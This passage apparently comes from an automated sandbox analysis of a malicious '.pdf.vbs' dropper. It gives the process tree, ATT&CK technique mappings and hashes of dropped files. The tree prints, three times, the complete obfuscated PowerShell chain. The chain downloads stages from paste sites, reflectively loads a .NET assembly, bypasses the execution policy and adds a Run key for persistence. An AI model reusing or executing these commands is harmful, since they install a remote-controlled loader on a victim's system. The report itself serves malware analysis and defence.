☹g☹Cc☹XwBf☹F8☹XwBf☹F8☹XwBf☹GY☹aQBv☹Gs☹dQBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹Z☹B4☹GQ☹dwBo☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\7zOCE3EA7F8\ad900090014424524524252.,pdf.vbs');powershell $Yolopolhggobek;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$dxdwh = '01' ;$trjfb = 'C:\Users\Admin\AppData\Local\Temp\7zOCE3EA7F8\ad900090014424524524252.,pdf.vbs' ;[Byte[]] $jbcmx = [system.Convert]::FromBase64String( $QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($jbcmx).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/uYHwA/r/ee.etsap//:sptth' , $trjfb , '________fioku____________________________________-------', $dxdwh, '1', 'Roda' ));"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:3616
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        5⤵
        
        PID:4968
    - - C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4240
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3976
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:4792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7zOCE3EA7F8\ad900090014424524524252.,pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1624
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4324
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zOCE314B59\ad900090014424524524252.,pdf.vbs"
  2⤵
  - Checks computer location settings
  PID:1092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bk☹Hg☹Z☹B3☹Gg☹I☹☹9☹C☹☹Jw☹w☹DE☹Jw☹g☹Ds☹J☹B0☹HI☹agBm☹GI☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹agBi☹GM☹bQB4☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹CQ☹UQBQ☹HQ☹YQB2☹C4☹cgBl☹H☹☹b☹Bh☹GM☹ZQ☹o☹Cc☹J☹☹k☹CQ☹J☹☹k☹Cc☹L☹☹n☹EE☹Jw☹p☹C☹☹KQ☹g☹Ds☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹EE☹c☹Bw☹EQ☹bwBt☹GE☹aQBu☹F0☹Og☹6☹EM☹dQBy☹HI☹ZQBu☹HQ☹R☹Bv☹G0☹YQBp☹G4☹LgBM☹G8☹YQBk☹Cg☹J☹Bq☹GI☹YwBt☹Hg☹KQ☹u☹Ec☹ZQB0☹FQ☹eQBw☹GU☹K☹☹n☹FQ☹ZQBo☹HU☹b☹Bj☹Gg☹ZQBz☹Fg☹e☹BY☹Hg☹e☹☹u☹EM☹b☹Bh☹HM☹cw☹x☹Cc☹KQ☹u☹Ec☹ZQB0☹E0☹ZQB0☹Gg☹bwBk☹Cg☹JwBN☹HM☹cQBC☹Ek☹YgBZ☹Cc☹KQ☹u☹Ek☹bgB2☹G8☹awBl☹Cg☹J☹Bu☹HU☹b☹Bs☹Cw☹I☹Bb☹G8☹YgBq☹GU☹YwB0☹Fs☹XQBd☹C☹☹K☹☹n☹D☹☹LwB1☹Fk☹S☹B3☹EE☹LwBy☹C8☹ZQBl☹C4☹ZQB0☹HM☹YQBw☹C8☹Lw☹6☹HM☹c☹B0☹HQ☹a☹☹n☹C☹☹L☹☹g☹CQ☹d☹By☹Go☹ZgBi☹C☹☹L☹☹g☹Cc☹XwBf☹F8☹XwBf☹F8☹XwBf☹GY☹aQBv☹Gs☹dQBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹Z☹B4☹GQ☹dwBo☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\7zOCE314B59\ad900090014424524524252.,pdf.vbs');powershell $Yolopolhggobek;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$dxdwh = '01' ;$trjfb = 'C:\Users\Admin\AppData\Local\Temp\7zOCE314B59\ad900090014424524524252.,pdf.vbs' ;[Byte[]] $jbcmx = [system.Convert]::FromBase64String( $QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($jbcmx).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/uYHwA/r/ee.etsap//:sptth' , $trjfb , '________fioku____________________________________-------', $dxdwh, '1', 'Roda' ));"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:3700
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        5⤵
        
        PID:3520
    - - C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1584
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7zOCE314B59\ad900090014424524524252.,pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:64
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1268
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zOCE353649\ad900090014424524524252.,pdf.vbs"
  2⤵
  - Checks computer location settings
  PID:2260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bk☹Hg☹Z☹B3☹Gg☹I☹☹9☹C☹☹Jw☹w☹DE☹Jw☹g☹Ds☹J☹B0☹HI☹agBm☹GI☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹agBi☹GM☹bQB4☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹CQ☹UQBQ☹HQ☹YQB2☹C4☹cgBl☹H☹☹b☹Bh☹GM☹ZQ☹o☹Cc☹J☹☹k☹CQ☹J☹☹k☹Cc☹L☹☹n☹EE☹Jw☹p☹C☹☹KQ☹g☹Ds☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹EE☹c☹Bw☹EQ☹bwBt☹GE☹aQBu☹F0☹Og☹6☹EM☹dQBy☹HI☹ZQBu☹HQ☹R☹Bv☹G0☹YQBp☹G4☹LgBM☹G8☹YQBk☹Cg☹J☹Bq☹GI☹YwBt☹Hg☹KQ☹u☹Ec☹ZQB0☹FQ☹eQBw☹GU☹K☹☹n☹FQ☹ZQBo☹HU☹b☹Bj☹Gg☹ZQBz☹Fg☹e☹BY☹Hg☹e☹☹u☹EM☹b☹Bh☹HM☹cw☹x☹Cc☹KQ☹u☹Ec☹ZQB0☹E0☹ZQB0☹Gg☹bwBk☹Cg☹JwBN☹HM☹cQBC☹Ek☹YgBZ☹Cc☹KQ☹u☹Ek☹bgB2☹G8☹awBl☹Cg☹J☹Bu☹HU☹b☹Bs☹Cw☹I☹Bb☹G8☹YgBq☹GU☹YwB0☹Fs☹XQBd☹C☹☹K☹☹n☹D☹☹LwB1☹Fk☹S☹B3☹EE☹LwBy☹C8☹ZQBl☹C4☹ZQB0☹HM☹YQBw☹C8☹Lw☹6☹HM☹c☹B0☹HQ☹a☹☹n☹C☹☹L☹☹g☹CQ☹d☹By☹Go☹ZgBi☹C☹☹L☹☹g☹Cc☹XwBf☹F8☹XwBf☹F8☹XwBf☹GY☹aQBv☹Gs☹dQBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹Z☹B4☹GQ☹dwBo☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\7zOCE353649\ad900090014424524524252.,pdf.vbs');powershell $Yolopolhggobek;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$dxdwh = '01' ;$trjfb = 'C:\Users\Admin\AppData\Local\Temp\7zOCE353649\ad900090014424524524252.,pdf.vbs' ;[Byte[]] $jbcmx = [system.Convert]::FromBase64String( $QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($jbcmx).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/uYHwA/r/ee.etsap//:sptth' , $trjfb , '________fioku____________________________________-------', $dxdwh, '1', 'Roda' ));"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:3384
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        5⤵
        
        PID:2824
    - - C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:1552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1836
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        
        PID:4768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7zOCE353649\ad900090014424524524252.,pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1840
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
60b841392dbf95b1b8aafc5506920739

SHA1
20c6506c6dbd5ea310beeb2f2ae8a0c840f78f6f

SHA256
39e6fe25ee32a3b31e0babfe22dd3e7048e0c43cc6bbf01ed0e18f0e0954f46e

SHA512
02f350418d506ed2d13beb15c8db43c645e6757b84d7831e288c0d33f388d40437a92c044e3abc79be73854d97a99c18b8bf1bf0abf88a39bf6652581962fb1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
408B

MD5
b626a2e1ce11cd4e1afff59b9353a7c6

SHA1
c5a1b9d20ad6742055c24a94288141f21c40020c

SHA256
e9dc73e0cd57e9e5bfaab9af2f1279966b931c709f04cc34d6030718f298245d

SHA512
d89afa01a0a82ca1e5b50850fc85de9783737b0157d72b245ed88bc40af41350b679985380a79307a8d241ae37ed489af712022a11dc5ebc5ce31366b1127fb5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
bc29415b34974d98bee9b1a9347d7c81

SHA1
6207e2fa2e7186dd321d4bf399b0e45449f27a3a

SHA256
085da38a103f512a3a5068dd64cc8a6b3625fc2ed3a37d5d02634b440a1cbfed

SHA512
